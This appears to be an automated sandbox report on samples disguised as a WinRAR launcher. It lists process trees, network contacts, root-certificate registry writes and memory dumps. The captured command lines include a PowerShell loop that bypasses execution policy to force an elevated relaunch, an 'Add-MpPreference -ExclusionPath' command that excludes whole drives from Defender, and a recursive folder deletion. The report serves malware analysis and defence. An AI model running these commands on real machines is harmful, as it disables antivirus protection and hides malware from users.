| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
143s
Max time network
162s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
149s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2208 wrote to memory of 2824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2208 wrote to memory of 2824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2208 wrote to memory of 2824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2208 -s 84
Network
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
131s
Max time network
168s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x43c 0x2ec
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 18.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_twdwmxgd.zk1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3744-6-0x0000023ED2F80000-0x0000023ED2FA2000-memory.dmp
memory/3744-10-0x00007FF934350000-0x00007FF934E11000-memory.dmp
memory/3744-11-0x0000023ED2EB0000-0x0000023ED2EC0000-memory.dmp
memory/3744-12-0x0000023ED2EB0000-0x0000023ED2EC0000-memory.dmp
memory/3744-15-0x00007FF934350000-0x00007FF934E11000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:25
Platform
win10v2004-20240226-en
Max time kernel
113s
Max time network
198s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.178.17.96.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
118s
Max time network
143s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
Network
Files
memory/2176-4-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
memory/2176-5-0x0000000001EC0000-0x0000000001EC8000-memory.dmp
memory/2176-6-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp
memory/2176-7-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-8-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp
memory/2176-10-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-9-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-11-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-12-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-13-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:25
Platform
win10v2004-20240226-en
Max time kernel
101s
Max time network
219s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.187.234:443 | tcp | |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
Files
memory/3088-0-0x00000000739A0000-0x0000000074150000-memory.dmp
memory/3088-1-0x0000000002940000-0x0000000002950000-memory.dmp
memory/3088-2-0x00000000028D0000-0x0000000002906000-memory.dmp
memory/3088-3-0x0000000005550000-0x0000000005B78000-memory.dmp
memory/3088-4-0x0000000005440000-0x0000000005462000-memory.dmp
